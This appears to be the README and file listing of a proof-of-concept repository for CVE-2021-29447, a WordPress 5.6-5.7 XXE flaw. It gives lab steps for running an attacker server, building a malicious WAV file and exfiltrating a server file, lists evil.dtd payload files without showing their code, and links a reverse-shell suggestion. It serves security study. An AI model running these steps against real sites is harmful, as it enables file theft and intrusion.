来源

关联漏洞

介绍

# POC CVE-2021029447 - XXE in WordPress
# WordPress 5.6-5.7 - Authenticated (Author+) XXE (CVE-2021-29447)

- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-29447


## Using

### Step1. Run WordPress

```
$ make up-wp
```

### Step2. Run Attacker web server

```
$ make up-mal
```

### Step3. Generate malicious WAV file

#### With wavefile npm

```
$ make make-wav
```

### Step4. Login to WordPress & Upload WAV file to New Media

```
open http://localhost:8000/
open http://localhost:8000/wp-admin/
```

vedi in console il file trafugato e puo' essere decodificato

# Risorse online


info sui comandi possibili nel file attaccante dtd https://www.php.net/manual/en/wrappers.php.php



### Spiegazione codice vulnerabile

https://github.com/Abdulazizalsewedy/CVE-2021-29447


### Walktroght 
- https://www.youtube.com/watch?v=tE8Smz1Jvb8
- https://github.com/Slowdeb/Tryhackme/blob/dfbdebe880ddcb5fbfc1f8608812a0e79fd7cf24/Wordpress-CVE-202129447.md?plain=1#L69
    Create a php reverse shell with "msfvenom" or use the awesome php reverse shell from [Pentestmonkey](https://github.com/pentestmonkey/php-reverse-shell). 

### Altre risorse
- https://www.trendmicro.com/it_it/research/19/d/zero-day-xml-external-entity-xxe-injection-vulnerability-in-internet-explorer-can-let-attackers-steal-files-system-info.html

文件快照

 [4.0K]  /data/pocs/5479775ce5065d1b37f210b914e31d1ca942103e
├── [4.0K]  attacker
│   ├── [ 525]  decode.php
│   ├── [4.0K]  malicious_wav
│   │   ├── [ 412]  index.js
│   │   ├── [  54]  package.json
│   │   └── [ 818]  package-lock.json
│   └── [4.0K]  www
│       ├── [ 193]  evil.dtd
│       ├── [ 413]  evil_.dtd
│       └── [ 209]  evil__.dtd
├── [642K]  attack_info.jpeg
├── [ 490]  docker-compose.yml
├── [4.0K]  examples
│   ├── [ 334]  01.xml
│   └── [ 159]  02.xml
├── [ 833]  Makefile
└── [1.3K]  README.md

4 directories, 13 files

备注